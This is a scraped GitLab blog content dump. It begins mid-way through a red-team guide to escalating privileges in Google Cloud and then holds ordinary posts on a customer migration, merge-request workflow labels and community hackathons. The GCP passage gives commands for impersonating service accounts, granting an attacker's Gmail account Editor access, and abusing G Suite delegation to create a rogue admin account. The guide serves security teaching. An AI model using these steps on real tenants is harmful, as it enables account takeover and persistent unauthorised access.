impersonation\n\nThere are three ways in which you can [impersonate another service account](https://cloud.google.com/iam/docs/understanding-service-accounts#impersonating_a_service_account):\n\n- Authentication using RSA private keys (covered [above](#find-service-account-keys))\n- Authorization using Cloud IAM policies (covered below)\n- Deploying jobs on GCP services (more applicable to the compromise of a user account)\n\nIt's 
possible that the service account you are currently authenticated as has permission to impersonate other accounts with more permissions and/or a less restrictive scope. This behavior is authorized by the predefined role called `iam.serviceAccountTokenCreator`.\n\nA good example here is that you've compromised an instance running as a custom service account with this role, and the default service account still exists in the project. As the default service account has the primitive role of Project Editor, it is possibly even more powerful than the custom account.\n\nEven better, you might find a service account with the primitive role of Owner. This gives you full permissions, and is a good target to then grant your own Google account rights to log in to the project using the web console.\n\n`gcloud` has a `--impersonate-service-account` [flag](https://cloud.google.com/sdk/gcloud/reference/#--impersonate-service-account) which can be used with any command to execute in the context of that account.\n\nTo give this a shot, you can try the following:\n\n```\n# View available service accounts\n$ gcloud iam service-accounts list\n\n# Impersonate the account\n$ gcloud compute instances list \\\n    --impersonate-service-account xxx@developer.gserviceaccount.com\n```\n\n### Exploring other projects\n\nIf you're really lucky, either the service account on your compromised instance or another account you've bagged thus far has access to additional GCP projects. You can check with the following command:\n\n```\n$ gcloud projects list\n```\n\nFrom here, you can hop over to that project and start the entire process over.\n\n```\n$ gcloud config set project [PROJECT-ID]\n```\n\n### Granting access to management console\n\nAccess to the [GCP management console](https://console.cloud.google.com/) is provided to user accounts, not service accounts. To log in to the web interface, you can grant access to a Google account that you control. 
This can be a generic \"@gmail.com\" account, it does not have to be a member of the target organization.\n\nTo grant the primitive role of Owner to a generic \"@gmail.com\" account, though, you'll need to use the web console. `gcloud` will error out if you try to grant it a permission above Editor.\n\nYou can use the following command to grant a user the primitive role of Editor to your existing project:\n\n```\n$ gcloud projects add-iam-policy-binding [PROJECT] \\\n    --member user:[EMAIL] --role roles/editor\n```\n\nIf you succeeded here, try accessing the web interface and exploring from there.\n\nThis is the highest level you can assign using the gcloud tool. To assign a permission of Owner, you'd need to use the console itself.\n\nYou need a fairly high level of permission to do this. If you're not quite there, keep reading.\n\n### Spreading to G Suite via domain-wide delegation of authority\n\n[G Suite](https://gsuite.google.com/) is Google's collaboration and productivity platform which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc. Many organizations use some or all of this platform as an alternative to traditional Microsoft AD/Exchange environments.\n\nService accounts in GCP can be granted the rights to programmatically access user data in G Suite by impersonating legitimate users. This is known as [domain-wide delegation](https://developers.google.com/admin-sdk/reports/v1/guides/delegation). This includes actions like reading email in Gmail, accessing Google Docs, and even creating new user accounts in the G Suite organization.\n\nG Suite has [its own API](https://developers.google.com/gsuite/aspects/apis), completely separate from anything else we've explored in this blog. Permissions are granted to G Suite API calls in a similar fashion to how permissions are granted to GCP APIs. 
However, G Suite and GCP are two different entities - being in one does not mean you automatically have access to another.\n\nIt is possible that a G Suite administrator has granted some level of G Suite API access to a GCP service account that you control. If you have access to the Web UI at this point, you can browse to IAM -> Service Accounts and see if any of the accounts have \"Enabled\" listed under the \"domain-wide delegation\" column. The column itself may not appear if no accounts are enabled. As of this writing, there is no way to do this programmatically, although there is a [request for this feature](https://issuetracker.google.com/issues/116182848) in Google's bug tracker.\n\nIt is not enough for you to simply enable this for a service account inside GCP. The G Suite administrator would also have to configure this in the G Suite admin console.\n\nWhether or not you know that a service account has been given permissions inside G Suite, you can still try it out. You'll need the service account credentials exported in JSON format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled.\n\nThis topic is a bit tricky... your service account has something called a \"client_email\" which you can see in the JSON credential file you export. It probably looks something like `account-name@project-name.iam.gserviceaccount.com`. If you try to access G Suite API calls directly with that email, even with delegation enabled, you will fail. This is because the G Suite directory will not include the GCP service account's email addresses. 
Instead, to interact with G Suite, we need to actually impersonate valid G Suite users.\n\nWhat you really want to do is to impersonate a user with administrative access, and then use that access to do something like reset a password, disable multi-factor authentication, or just create yourself a shiny new admin account.\n\nWe've created [this Python script](https://gitlab.com/gitlab-com/gl-security/gl-redteam/gcp_misc/blob/master/gcp_delegation.py) that can do two things - list the user directory and create a new administrative account. Here is how you would use it:\n\n```\n# Validate access only\n$ ./gcp_delegation.py --keyfile ./credentials.json \\\n    --impersonate steve.admin@target-org.com \\\n    --domain target-org.com\n\n# List the directory\n$ ./gcp_delegation.py --keyfile ./credentials.json \\\n    --impersonate steve.admin@target-org.com \\\n    --domain target-org.com \\\n    --list\n\n# Create a new admin account\n$ ./gcp_delegation.py --keyfile ./credentials.json \\\n    --impersonate steve.admin@target-org.com \\\n    --domain target-org.com \\\n    --account pwned\n```\n\nYou can try this script across a range of email addresses to impersonate various users. Standard output will indicate whether or not the service account has access to G Suite, and will include a random password for the new admin account if one is created.\n\nIf you have success creating a new admin account, you can log on to the [Google admin console](https://admin.google.com) and have full control over everything in G Suite for every user - email, docs, calendar, etc. 
Go wild.",[865,3091,9],{"slug":4396,"featured":6,"template":689},"plundering-gcp-escalating-privileges-in-google-cloud-platform","content:en-us:blog:plundering-gcp-escalating-privileges-in-google-cloud-platform.yml","Plundering Gcp Escalating Privileges In Google Cloud Platform","en-us/blog/plundering-gcp-escalating-privileges-in-google-cloud-platform.yml","en-us/blog/plundering-gcp-escalating-privileges-in-google-cloud-platform",{"_path":4402,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4403,"content":4409,"config":4415,"_id":4417,"_type":14,"title":4418,"_source":16,"_file":4419,"_stem":4420,"_extension":19},"/en-us/blog/proximus-customer-story-clearcase-to-gitlab",{"title":4404,"description":4405,"ogTitle":4404,"ogDescription":4405,"noIndex":6,"ogImage":4406,"ogUrl":4407,"ogSiteName":673,"ogType":674,"canonicalUrls":4407,"schema":4408},"Proximus shares its #movingtoGitLab story","Moving to GitLab resulted in an 80 percent drop in support tickets and an increase in developer productivity.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749678603/Blog/Hero%20Images/traffic-at-sunset.jpg","https://about.gitlab.com/blog/proximus-customer-story-clearcase-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Proximus shares its #movingtoGitLab story\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Bert Van Eyck\"}],\n        \"datePublished\": \"2019-06-07\",\n      }",{"title":4404,"description":4405,"authors":4410,"heroImage":4406,"date":4412,"body":4413,"category":682,"tags":4414},[4411],"Bert Van Eyck","2019-06-07","\n[Proximus](https://www.proximus.com/) is a telecommunication company providing services to residential, enterprise, and public users. 
We are the leading provider of telephony, internet, television, and network-based ICT services in Belgium, with more than 2 million customers.\n\n## Our road to GitLab\n\nThe technical divisions of Proximus deliver a big part of the applications and systems required for delivering the best possible service to our end users. It includes all types of capabilities such as network construction, network maintenance, product ordering, product selling, billing, etc.\nSome examples of our development include:\n\n- Our website, [Proximus.be](https://www.proximus.be), on which users can find product info, support info and so much more.\n- A mobile app where everyone can check their usage, products, bills, etc.\n- Television interface.\n- A television app.\n\nTo ensure a performant and stable working environment for our developers, we have been working for several years to create a CI/CD DevOps workflow.\n\nThe first complete chain started in 2014 and used tools like ClearCase, Jenkins, Nexus, etc. By 2015 we had about 200 applications which were using our end-to-end chain to build and deploy in all different environments.\n\nIn 2016, to continue to improve our delivery chain, we considered switching ClearCase to Git. Despite ClearCase being a powerful tool, we noticed that the learning curve and the ease of use of ClearCase was not optimal. Also some of the tools we used were starting to lose compatibility.\n\nWe quickly came across GitLab and decided to try our first setup with [GitLab CE](/blog/gitlab-tiers/) in mid-2016.\n\n## The evolution of GitLab inside Proximus\n\nOur first implementation of GitLab rapidly became a real success and the popularity of GitLab was increasing exponentially within our developer community. 
So, we decided to set up a corporate GitLab CE server at Proximus and to promote the creation of all new applications using our existing CI/CD chain with GitLab as source code management.\nIn just one year of using GitLab, we grew to 325 projects and about 600 users.\n\nBecause GitLab was becoming a big part of our tool set, we switched to GitLab EE in Q2 of 2017. This allowed us to use more features of GitLab such as: LDAP groups, push rules, mirror repositories, etc.\nAnd of course, with the enterprise edition you also receive additional support. With the enterprise edition we also started moving applications from ClearCase to GitLab.\n\nWe were also investigating and testing other features to expand our use of GitLab in the meantime:\n\n- Some projects have started using GitLab CI to build.\n- Integration with Jira has been implemented.\n- Currently experimenting with a first setup of GitLab’s global search function in combination with Elasticsearch.\n\nBy the end of 2018 we had grown to almost 1,000 users and 1,700 projects.\n\n## Challenges\n\nOur biggest challenge was to maintain and ensure a stable environment while growing rapidly. When we started using GitLab CI we encountered some issues with the large number of pipelines and jobs being created, which were consuming a lot of our resources. But [as of GitLab 11.6 a feature has been provided to remove pipelines with their job logs when using API](/releases/2018/12/22/gitlab-11-6-released/#pipelines-can-now-be-deleted-by-project-maintainers-using-api), which helped a lot.\n\n## Results\n\nSince we started using GitLab, we have been able to provide our developers with faster setup and support. Another very noticeable side effect of switching to GitLab was the significant drop in the number of support tickets created by the developers. 
Our first full year of using GitLab inside our CI/CD setup resulted in **80 percent** fewer tickets.\n\nEven in 2018, after our total number of users had grown to almost 1,000, the number of projects had multiplied by five and we migrated 75 applications to GitLab. We still had **65 percent** fewer tickets.\n\nIn the future, we will continue looking into expanding our GitLab environment and we hope to continue the positive evolution together with the support of GitLab.\n",[267,751,231,910,9],{"slug":4416,"featured":6,"template":689},"proximus-customer-story-clearcase-to-gitlab","content:en-us:blog:proximus-customer-story-clearcase-to-gitlab.yml","Proximus Customer Story Clearcase To Gitlab","en-us/blog/proximus-customer-story-clearcase-to-gitlab.yml","en-us/blog/proximus-customer-story-clearcase-to-gitlab",{"_path":4422,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4423,"content":4428,"config":4434,"_id":4436,"_type":14,"title":4437,"_source":16,"_file":4438,"_stem":4439,"_extension":19},"/en-us/blog/pursuing-faster-time-to-merge-for-wider-community-contributions",{"title":4424,"description":4425,"ogTitle":4424,"ogDescription":4425,"noIndex":6,"ogImage":2028,"ogUrl":4426,"ogSiteName":673,"ogType":674,"canonicalUrls":4426,"schema":4427},"Pursuing faster time-to-merge for wider community contributions","How introducing more explicit contribution stages lowered the time it takes to merge a community contribution.","https://about.gitlab.com/blog/pursuing-faster-time-to-merge-for-wider-community-contributions","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Pursuing faster time-to-merge for wider community contributions\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Nick Veenhof\"}],\n        \"datePublished\": \"2022-09-13\",\n      
}",{"title":4424,"description":4425,"authors":4429,"heroImage":2028,"date":4430,"body":4431,"category":10,"tags":4432},[2812],"2022-09-13","\n\nOne of GitLab's core strategies is to [build on our open core\nstrength](/company/strategy/#2-build-on-our-open-core-strength). We believe that building a\nstrong community of contributors is key to the long-term success of GitLab. We believe in a [dual-flywheel\nstrategy](/company/strategy/#dual-flywheels) that focuses on both product contributions from\nwithin our GitLab engineering team and community contributions. \n\nOur goal is to grow to 1000 contributors per month. The saying is that \"All roads lead to Rome,\" but of course not all of those roads are the most efficient ways to get there. To succeed, contributing to GitLab must be a rewarding and incentivizing experience that\nmotivates contributors to come back. One of the strategic choices we made in the [contributor\nsuccess](https://about.gitlab.com/handbook/marketing/developer-relations/contributor-success/) team is the route of being as\nresponsive and clear as we can about the next steps, using processes and automation. \n\n## Problem statement\n\nSo where do we start? On average GitLab has over [550 open merge\nrequests](https://gitlab.com/groups/gitlab-org/-/merge_requests?scope=all&state=opened&label_name[]=Community%20contribution).\nWe wanted to focus on the _ready enough_ problem. When is an MR ready for review? And when is an MR still in development? In\nboth cases collaboration is required, but having a formal handoff — meaning this contribution is ready for a review — helps in\nunderstanding who is blocked from moving forward. Before a merge request can find its way into GitLab, it needs to get a\nreview from at least one maintainer.\n\nHow do we know when to ask specific maintainers of our product areas to put their focus on reviewing these merge requests? When is a merge request _ready enough_ for a thorough review? 
What does _ready enough_ even mean?\n\nSome OSS communities use crowdsourced reviews for contributions to make sure the project maintainers don’t need to take on everything by themselves. For example, in the Drupal community there is the concept of [Reviewed and Tested by the Community](https://www.drupal.org/community/contributor-guide/task/triage-the-drupal-core-rtbc-queue). At GitLab we have MR coaches and community help to make sure everything is as ready as can be before involving the maintainers.\n\nThe GitLab bot and our MR coaches try to assist the wider community contributors on their way. We also had a ping-pong label that tried to signify if a community contributor had reacted and it was ‘ping ponged 🏓’ back to the GitLab team members. This pingpong label didn’t take the context into account. It was a great iterative and [boring solution](https://handbook.gitlab.com/handbook/values/#boring-solutions) to know who was up next (the author or the reviewer). But it had a lot of false-positives and caused confusion to both the maintainers and the community contributors.\n\nSo where do we go from here? How do we get a better grasp on this _ready enough_ problem? Let’s start by asking for help from our recommended reading list, [High-Output Management](/handbook/leadership/high-output-management/). Author Andrew S. Grove states: “A very important way to increase productivity is to arrange the work flow inside our black box so that it will be characterized by high output per activity, which is to say high-leverage activities.”\n\n## Introducing workflow labels\n\nFor a while, GitLab team members were using workflow labels to signify the state of a merge request. It wasn’t always used across all teams, but they were available. 
More specifically we’re looking at the following labels:\n\n- `workflow::ready for review`\n- `workflow::in dev`\n- `workflow::blocked`\n\nEach wider community contributor is now [able to change these labels themselves](https://docs.gitlab.com/ee/development/contributing/#contribution-flow). By using `@gitlab-bot ready`, it sets the state to `workflow::ready for review` and assigns a reviewer. The reviewer is able to set it back to `workflow::in dev` if there are still items to be addressed. Other wider community members can also leave comments or suggestions for improvement, and then [set the label](https://about.gitlab.com/handbook/engineering/quality/triage-operations/#reactive-label-command) back to `workflow::in dev`, or set other labels to help triage these merge requests.\n\n## What have we learned so far?\n\nWe started using this system over two months ago. We now know that around 20% of MRs on average are in a \"ready for review\"\nstate. Those contributors are blocked and waiting for an answer to either continue to improve the merge request or get\nit merged if there are no more comments left. We also noticed that some merge requests were not getting a lot of\nattention. We did an async retrospective and feedback session with the GitLab team members and the wider community in order to find an answer on how we can\n[improve the time it takes before a review is made](https://gitlab.com/gitlab-com/www-gitlab-com/-/issues/13718) for\ncontributions that were ready for a review. We’re still processing that feedback, but are looking to try some of these\nsuggestions, learn from them, and iterate. Even though GitLab cannot promise timely reviews, we can certainly try to\nbuild in mechanisms, and understand where we see limits, to navigate towards better processes. When we started out, we\nhad a median time of 17 days that an MR was in the ready for review state. 
Today that median time has been reduced to five days!\n\nThe median Open Community MR Age (OCMA) has also dropped from 139 days in April to 78 days in August. Maybe it is a\ncoincidence that we reached an all-time high of 126 contributors in August? Either way, all of the steps allowed our amazing wider\ncommunity contributors to get 440 merge requests merged in a single month! I’m certain this change contributed, among other\nchanges and initiatives, to that record. We will keep learning as we progress. It certainly allowed us to take a peek\ninto our little black box.\n\n## What’s next?\n\nNext up is to continue our iterations and move further towards automation. Right now it is up to the reviewer to set the\nstatus back to `workflow::in dev` whenever there is something left to address. We notice that this is not always changed\nback when it’s actually needed. It is also causing false-positives with reviewers and our wider community members.\nThe Contributor Success team is looking into how this can be automated. If you’d like to help, the automation happens in\nthe [Triage Ops project](https://gitlab.com/gitlab-org/quality/triage-ops/) and the Contributor Success [issue\nqueue](https://gitlab.com/gitlab-com/quality/contributor-success/-/issues) is open for everyone!\n\nWe’re also looking into a new program called [Leading\nOrganizations](https://gitlab.com/gitlab-com/www-gitlab-com/-/merge_requests/110700) which rewards recurring\ncontributors, and their organizations, with a review time objective of four business days. This would lead us to even\nshorter review cycle times and give those organizations that contribute to GitLab a competitive advantage to stay\nleaders in their domain. The faster we can innovate together, the faster our dual flywheel will spin. Together we go to\ninfinity and beyond. 
Together we can build software fast.\n\n\n\n\n",[4433,708,9],"code review",{"slug":4435,"featured":6,"template":689},"pursuing-faster-time-to-merge-for-wider-community-contributions","content:en-us:blog:pursuing-faster-time-to-merge-for-wider-community-contributions.yml","Pursuing Faster Time To Merge For Wider Community Contributions","en-us/blog/pursuing-faster-time-to-merge-for-wider-community-contributions.yml","en-us/blog/pursuing-faster-time-to-merge-for-wider-community-contributions",{"_path":4441,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4442,"content":4447,"config":4452,"_id":4454,"_type":14,"title":4455,"_source":16,"_file":4456,"_stem":4457,"_extension":19},"/en-us/blog/q1-hackathon-announcement",{"title":4443,"description":4444,"ogTitle":4443,"ogDescription":4444,"noIndex":6,"ogImage":1348,"ogUrl":4445,"ogSiteName":673,"ogType":674,"canonicalUrls":4445,"schema":4446},"Get ready for the Q1'2019 GitLab Hackathon","The first Hackathon in 2019 for the GitLab community will take place on February 12-13.","https://about.gitlab.com/blog/q1-hackathon-announcement","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Get ready for the Q1'2019 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-01-14\",\n      }",{"title":4443,"description":4444,"authors":4448,"heroImage":1348,"date":4449,"body":4450,"category":10,"tags":4451},[704],"2019-01-14","\n\nFirst of all, I want to wish a Happy New Year to everyone in the GitLab community! I'm certainly looking forward to continued collaboration with everyone in 2019. Following successful [Hackathons in 2018](/community/hackathon/past-events/), I'm excited to announce that the first Hackathon this year will take place on Feb. 
12-13.\n\n## What's the deal?\n\nThis is a virtual event where community members get together to work on merge requests (MRs) and also to welcome and help new contributors. We will be adding more details on [the Hackathon landing page](/community/hackathon/), as we get closer to the event, including prizes for everyone who has MRs merged within 10 days of the conclusion of the Hackathon.\n\n## What else is taking place?\n\nWe are again planning tutorial sessions where community experts will lead presentations plus Q&A sessions on a variety of topics. As speakers get confirmed, you will see tutorial sessions added on [the Hackathon landing page](/community/hackathon/). All the tutorial sessions will be recorded and added to the [GitLab Hackathon playlist](https://www.youtube.com/playlist?list=PLFGfElNsQthapq-CyXBTVnT2yKqg1JrNh). If you missed tutorials from past Hackathons, I encourage you to check out videos from the playlist.\n\n![Hackathon playlist](https://about.gitlab.com/images/blogimages/hackathon-playlist.png){: .shadow.medium.center}\n*\u003Csmall>Tutorial videos on the Hackathon playlist\u003C/small>*\n\nFor the upcoming Hackathon, we will also be highlighting issues from different [GitLab product categories](/handbook/product/categories/) that we want to encourage community members to work on. There will be additional prizes for community members who work on these issues and have MRs merged.\n\n## Where can I find help during the Hackathon?\n\nFor communications during the Hackathon, we will again use the [GitLab Community room in Gitter](https://gitter.im/gitlabhq/community). This is a channel designed to have community-related discussions and for community members to help each other as people have questions when contributing to GitLab. 
This is open to everyone, so please [join the room](https://gitter.im/gitlabhq/community) if you are not part of it already.\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\nCover image: [\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel)\n{: .note}\n",[267,779,9,277],{"slug":4453,"featured":6,"template":689},"q1-hackathon-announcement","content:en-us:blog:q1-hackathon-announcement.yml","Q1 Hackathon Announcement","en-us/blog/q1-hackathon-announcement.yml","en-us/blog/q1-hackathon-announcement",{"_path":4459,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4460,"content":4465,"config":4469,"_id":4471,"_type":14,"title":4472,"_source":16,"_file":4473,"_stem":4474,"_extension":19},"/en-us/blog/q1-hackathon-recap",{"title":4461,"description":4462,"ogTitle":4461,"ogDescription":4462,"noIndex":6,"ogImage":1348,"ogUrl":4463,"ogSiteName":673,"ogType":674,"canonicalUrls":4463,"schema":4464},"What went down at the Q1'2020 GitLab Hackathon","A recap of GitLab community's accomplishments during another record-setting Hackathon on February 12-13.","https://about.gitlab.com/blog/q1-hackathon-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What went down at the Q1'2020 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2020-03-25\",\n      }",{"title":4461,"description":4462,"authors":4466,"heroImage":1348,"date":2092,"body":4467,"category":951,"tags":4468},[704],"\n\n{::options parse_block_html=\"true\" /}\n\n\n\nThe GitLab community gathered on February 12-13 for the 
Q1 Hackathon and this is almost becoming a cliche, but the GitLab Community again set an impressive Hackathon record with [almost 150 MRs](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/31)!\n\n## What did we accomplish?\n\nI'm not sure how many readers remember the first Hackathon in Q3'2018, but I remember being excited about [22 MRs](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/4) submitted during the inaugural event. If someone told me we would see 147 MRs in a single Hackathon someday, I don't think I would have believed it. Again, I have to give big kudos to wider community members and reviewers who helped make our Hackathon such a fun and exciting event. \n\nI would like to highlight a few things from the Hackathon. First, just like in Q4 we had frontend Epics that resulted in many community contributions. One was [Replacing Underscore with Lodash](https://gitlab.com/groups/gitlab-org/-/epics/2412) created by [Scott Stern](https://gitlab.com/sstern) and the other was to [Migrate .fa-spinner to .spinner](https://gitlab.com/groups/gitlab-org/-/epics/956) that was created by [Brandon Labuschagne](https://gitlab.com/blabuschagne) before the Hackathon. Amazingly, both Scott and Brandon were able to review and provide feedback on over 50 MRs related to these Epics that turned out to be goldmines.   \n\nAlso during this Hackathon, there were MRs across more than 20 GitLab projects demonstrating the breadth of contributions (to go along with the volume). 
Not surprisingly, many people usually think of the [`gitlab` project](https://gitlab.com/gitlab-org/gitlab), but wider community members contributed to projects like [Charts](https://gitlab.com/gitlab-org/charts/gitlab), [Gitaly](https://gitlab.com/gitlab-org/gitaly/), [GitLab SVGs](https://gitlab.com/gitlab-org/gitlab-svgs), [Gitter](https://gitlab.com/gitlab-org/gitter), [Omnibus](https://gitlab.com/gitlab-org/omnibus-gitlab/), [Pajama Design System](https://gitlab.com/gitlab-org/gitlab-services/design.gitlab.com/), [Runner](https://gitlab.com/gitlab-org/gitlab-runner/), [Secure](https://gitlab.com/gitlab-org/security-products), [www-gitlab-com](https://gitlab.com/gitlab-com/www-gitlab-com), and others during the event.   \n\nFinally, the [GitLab Meetup Group in Hamburg](https://www.meetup.com/GitLab-Meetup-Hamburg/) had their [meetup](https://www.meetup.com/GitLab-Meetup-Hamburg/events/268054258/) to coincide with the Hackathon, so [David Planella](https://gitlab.com/dplanella), [John Coghlan](https://gitlab.com/johncoghlan), and [I](https://gitlab.com/rpaik) were able to join the Hamburg meetup remotely to talk about the Hackathon and how to contribute to GitLab. We had a great time participating in the meetup and I want to thank [Philipp Westphalen](https://gitlab.com/Phil404) for not only inviting us, but also flawlessly working the conferencing tool and the audio/video equipment. If there are other GitLab meetup organizers who are interested in organizing your meetup around a Hackathon, please let me know! \n\n![Hamburg meetup](https://about.gitlab.com/images/blogimages/hackathon-blogpost/Hamburg-meetup.png){: .shadow.medium.center}\n\n## Hackathon prizes\n\nFor this Hackathon, we have a packable duffle for everyone who had their MRs merged by February 25th and [34 people](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/-/issues/33) will be receiving the GitLab branded duffle bag. 
This sets another record for the number of people with MRs merged during the Hackathon. As we did in the past several quarters, we have a prize for second place and [Raihan Kabir](https://gitlab.com/rk4bir) is the winner with 7 MRs merged. For the grand prize, I want to award two contributors [Takuya Noguchi](https://gitlab.com/tnir) with 13 MRs merged and [Rajendra Kadam](https://gitlab.com/raju249) with 17 MRs merged. Thanks and congratulations to everyone!\n\n![Hackathon prizes](https://about.gitlab.com/images/blogimages/hackathon-blogpost/q12020-hackathon.prizes.png){: .shadow.medium.center}\n\n## When is the next Hackathon?\n\nI'm happy to announce that the Q2 Hackathon will take place on May 13-14, 2020. It is already advertised on [the Hackathon page](/community/hackathon/) with a new countdown clock. Please look out for more announcements as we get closer to the next Hackathon date. Also, if you have any suggestions for the Q2 Hackathon please feel free to suggest them on [the GitLab Contributors Gitter](https://gitter.im/gitlabhq/contributors).\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at `rpaik@gitlab.com`.\n\n[\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}\n",[267,779,9],{"slug":4470,"featured":6,"template":689},"q1-hackathon-recap","content:en-us:blog:q1-hackathon-recap.yml","Q1 Hackathon 
Recap","en-us/blog/q1-hackathon-recap.yml","en-us/blog/q1-hackathon-recap",{"_path":4476,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4477,"content":4482,"config":4487,"_id":4489,"_type":14,"title":4490,"_source":16,"_file":4491,"_stem":4492,"_extension":19},"/en-us/blog/q2-hackathon-recap",{"title":4478,"description":4479,"ogTitle":4478,"ogDescription":4479,"noIndex":6,"ogImage":1348,"ogUrl":4480,"ogSiteName":673,"ogType":674,"canonicalUrls":4480,"schema":4481},"What went down at the Q2'2019 GitLab Hackathon","Here's a recap of GitLab community accomplishments during the Hackathon on May 29-30.","https://about.gitlab.com/blog/q2-hackathon-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What went down at the Q2'2019 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2019-06-24\",\n      }",{"title":4478,"description":4479,"authors":4483,"heroImage":1348,"date":4484,"body":4485,"category":10,"tags":4486},[704],"2019-06-24","\n\nThe GitLab community gathered on May 29-30 for the Q2 Hackathon, and I was again excited to see new contributors participating. We also had more people joining the tutorial sessions and watching the recordings on [the Hackathon playlist](https://www.youtube.com/playlist?list=PLFGfElNsQthapq-CyXBTVnT2yKqg1JrNh). I was surprised when one of the community members told me he joined the kickoff session when it was past 1am his time!\n\n![Hackathon playlist](https://about.gitlab.com/images/blogimages/Hackathon_playlist.png){: .shadow.medium.center}\n\n## So what did we accomplish?\n\nEven though the Hackathon was during a holiday week in many countries, [44 merge requests (MRs)](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/issues/18) were submitted and more than 30 of these MRs were merged within two weeks of the event. 
One of the things we did during this recent Hackathon was to maintain [a list of suggested issues](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/issues/17#suggested-issues-list), and one of the issues was picked up shortly after it was discussed during [the GitLab Monitor tutorial session](https://www.youtube.com/watch?v=mm_8wVjn808&list=PLFGfElNsQthapq-CyXBTVnT2yKqg1JrNh&index=3&t=0s). Now, that's what I call just-in-time hacking.\n\n## Hackathon prizes\n\nSimilar to past events, everyone who had MRs merged will receive a token of our appreciation for their contribution. During the Q2 Hackathon, [18 people](https://gitlab.com/gitlab-com/marketing/community-relations/contributor-program/hackathon/issues/20) had their MRs merged and we decided to award a second place prize along with the grand prize based on the number of MRs merged. I'm happy to announce that we have a tie for the second place with [Michel Engelen](https://gitlab.com/michel.engelen) and [Marc Schwede](https://gitlab.com/schwedenmut) who both had three MRs merged. The grand prize goes to [Marcel Amirault](https://gitlab.com/Ravlen) (a former [MVP](/community/mvp/)), with nine merged MRs.\n\nThanks and congratulations to everyone!\n\n## When is the next Hackathon?\n\nSome of the feedback I received was a suggestion to release future Hackathon dates earlier, so I'm happy to announce that the Q3 Hackathon will take place on August 28-29. It is already advertised on [the Hackathon page](/community/hackathon/) with a new countdown clock. Please look out for more announcements as we get closer to the next Hackathon date. 
Also, if you have any suggestions for the Q3 Hackathon please feel free to bring them to [the GitLab Contributors Gitter](https://gitter.im/gitlabhq/contributors).\n\n![Q3 Hackathon date](https://about.gitlab.com/images/blogimages/Q3_hackathon_date.png){: .shadow.medium.center}\n\n## How do I get started with contributing?\n\nA good place to start is the [Contributing to GitLab page](/community/contribute/), where you can learn how you can\ncontribute to GitLab code, documentation, translation, and UX design.\n\nIf you have any questions, you are always welcome to reach me at rpaik@gitlab.com.\n\n[\"GitLab application screengrab\"](https://unsplash.com/photos/ZV_64LdGoao) by [Pankaj Patel](https://unsplash.com/@pankajpatel) on Unsplash\n{: .note}\n",[267,779,9],{"slug":4488,"featured":6,"template":689},"q2-hackathon-recap","content:en-us:blog:q2-hackathon-recap.yml","Q2 Hackathon Recap","en-us/blog/q2-hackathon-recap.yml","en-us/blog/q2-hackathon-recap",{"_path":4494,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":4495,"content":4500,"config":4504,"_id":4506,"_type":14,"title":4507,"_source":16,"_file":4508,"_stem":4509,"_extension":19},"/en-us/blog/q3-hackathon-recap",{"title":4496,"description":4497,"ogTitle":4496,"ogDescription":4497,"noIndex":6,"ogImage":1348,"ogUrl":4498,"ogSiteName":673,"ogType":674,"canonicalUrls":4498,"schema":4499},"What went down at the Q3'2020 GitLab Hackathon","A recap of community's accomplishments during another record-setting Hackathon on September 2-3.","https://about.gitlab.com/blog/q3-hackathon-recap","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"What went down at the Q3'2020 GitLab Hackathon\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Ray Paik\"}],\n        \"datePublished\": \"2020-09-30\",\n      
